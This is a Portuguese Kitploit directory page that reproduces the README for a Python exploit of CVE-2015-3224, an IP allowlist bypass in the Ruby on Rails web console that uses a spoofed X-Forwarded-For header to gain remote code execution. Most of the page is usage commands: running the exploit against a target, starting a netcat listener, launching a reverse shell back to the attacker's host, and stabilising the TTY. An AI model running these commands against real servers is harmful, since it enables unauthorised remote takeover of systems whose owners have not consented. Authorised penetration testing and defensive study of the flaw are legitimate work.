Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2015-3224 — Exploit do Web Console do Ruby on Rails (CVE-2015-3224) | Kitploit
Ferramentas/GitHubGitHub/sic4rio/cve-2015-3224
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubsic4rio/cve-2015-3224

CVE-2015-3224

Exploit do Web Console do Ruby on Rails (CVE-2015-3224)

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Ruby on Rails Web Console Exploit (CVE-2015-3224)

CVE-2015-3224

Este repositório contém um script Python para explorar uma vulnerabilidade de bypass da lista de permissões de IP no console web de desenvolvimento do Ruby on Rails 4.0.x e 4.1.x. O script permite a execução remota de código em servidores vulneráveis.

⚠️ Aviso Este script destina-se apenas a fins educacionais e a testes de segurança autorizados. Não o utilize em nenhum sistema sem permissão explícita. Os autores não são responsáveis por qualquer uso indevido ou dano causado por este script.


📌 Descrição da Vulnerabilidade

O console web nas versões vulneráveis do Ruby on Rails destina-se a fins de desenvolvimento e deve ser acessível apenas a partir de endereços IP confiáveis. No entanto, devido ao tratamento inadequado do cabeçalho HTTP X-Forwarded-For, um atacante pode forjar o seu endereço IP para parecer um utilizador local confiável (por exemplo, 127.0.0.1 ou ::1). Isto contorna a lista de permissões de IP e concede acesso não autorizado ao console web, levando à execução remota de código.


🚀 Funcionalidades

  • Fácil de Utilizar: Interface simples de linha de comandos.
  • Descoberta Dinâmica de Caminhos: Testa automaticamente o alvo para encontrar o caminho dinâmico da sessão do console.
  • Dois Modos de Shell:
    • Shell Simples: Um shell básico e não interativo para comandos rápidos.
    • Shell TTY Reverso: Um comando de uma linha para obter um reverse shell PTY totalmente interativo.
  • Legibilidade Melhorada: Saída com código de cores para mensagens de estado, sucessos e erros.
  • Robusto: Inclui tratamento de erros para problemas de rede e comandos falhados.

✅ Requisitos

  • Python 3
  • Biblioteca requests

Instalar requests:

root@kitploit:~
pip install requests

⚙️ Utilização

  1. Clonar o repositório:

    root@kitploit:~
    git clone https://github.com/Sic4rio/CVE-2015-3224
    cd <diretório-do-repositório>
    
  2. Tornar o script executável:

    root@kitploit:~
    chmod +x exploit.py
    

Opção 1: Shell Interativo Simples

Este modo é útil para executar comandos rápidos e simples.

root@kitploit:~
./exploit.py -t http://<IP_ALVO>:<PORTA>

Opção 2: TTY Interativo Completo (Reverse Shell)

Este é o modo recomendado para obter um shell estável e totalmente interativo.

Passo 1: Iniciar um Listener

Na sua máquina local, abra um novo terminal e inicie um listener netcat.

root@kitploit:~
nc -lvnp 9001

Passo 2: Executar o Exploit

Noutro terminal, execute o script com a flag --rev-shell, fornecendo o seu IP local (lhost) e porta (lport).

root@kitploit:~
./exploit.py -t http://<IP_ALVO>:<PORTA> --rev-shell --lhost <SEU_IP> --lport 9001

Passo 3: Estabilizar o Shell

Uma ligação chegará ao seu listener netcat. Para a atualizar para um TTY totalmente interativo, siga estes passos na janela do netcat:

  1. Coloque o shell em segundo plano pressionando Ctrl+Z.
  2. Configure o seu terminal local para o modo raw e traga o shell para o primeiro plano.
    root@kitploit:~
    stty raw -echo; fg
    
    Pressione Enter se o prompt não reaparecer.
  3. Defina as propriedades do terminal no shell remoto.
    root@kitploit:~
    reset
    export SHELL=bash
    export TERM=xterm-256color
    stty rows 50 cols 120
    

Agora tem um shell totalmente funcional e estável!


👥 Créditos

  • Exploit Original: Eval (@0xEval)
  • O ficheiro Readme.md: GPT
Baixar ferramenta